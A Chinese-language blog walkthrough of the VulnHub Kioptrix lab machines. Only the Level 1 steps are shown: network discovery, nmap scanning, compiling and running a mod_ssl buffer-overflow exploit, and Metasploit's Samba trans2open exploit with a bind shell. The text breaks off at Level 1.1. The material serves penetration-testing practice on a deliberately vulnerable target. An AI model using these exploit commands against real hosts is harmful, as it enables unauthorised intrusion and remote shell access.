vlunhub靶机一Kioptrix

Kioptrix

目录

Kioptrix

Kioptrix Level 1 (#1)

1.查找靶机ip地址

2.对靶机进行端口扫描

3.1 ssl漏洞利用

3.2samba协议漏洞利用

Kioptrix Level 1.1 (#2)

1.查找靶机ip

2.端口扫描

3.web漏洞

4.提权

Kioptrix Level 1.2 (#3)

1.查找靶机ip

2.端口扫描

3.CMS漏洞利用

4.查找配置文件进入phpmyadmin,ssh登录靶机

Kioptrix: Level 1.3 (#4)

1.查找靶机ip

2.端口扫描

3.对web登录页面进行sql注入

4.ssh登录

5.连接mysql并使用udf提权

 

Kioptrix: 2014

1.靶机ip

2.端口扫描

3.访问80端口,查看页面源代码,访问

查找pChart2.1.3的相关漏洞并利用

4.访问8080端口,查看其它信息

5.查找phptax利用漏洞

6.提权



Kioptrix Level 1 (#1)

1.查找靶机ip地址

nbtscan 192.168.43.0/24       #netbios协议查找
fping -asg 192.168.43.0/24    #icmp协议查找
arp-scan 192.168.43.0/24      #基于arp协议查找

2.对靶机进行端口扫描

nmap -sV -p- 192.168.43.54

3.1 ssl漏洞利用

mod_ssl<2.8.7有远程缓冲区溢出漏洞,查找并利用

searchsploit "mod_ssl"
cp /usr/share/exploitdb/exploits/unix/remote/47080.c .
gcc -o ssl_exp 47080.c -lcrypto    

./ssl_exp 0x6b 192.168.43.54 -c 40    #0x6b为对应的系统

3.2samba协议漏洞利用

(1)msf查找smb版本

search "samba_version"
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.43.54
exploit

(2)msf利用漏洞

search samba 2.2
use exploit/linux/samba/trans2open
set payload linux/x86/shell/bind_tcp
set rhost 192.168.43.54
exploit

 

Kioptrix Level 1.1 (#2)

1.查找靶机ip

2.端口扫描

nmap -sV -p- 192.168.43.47

<

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值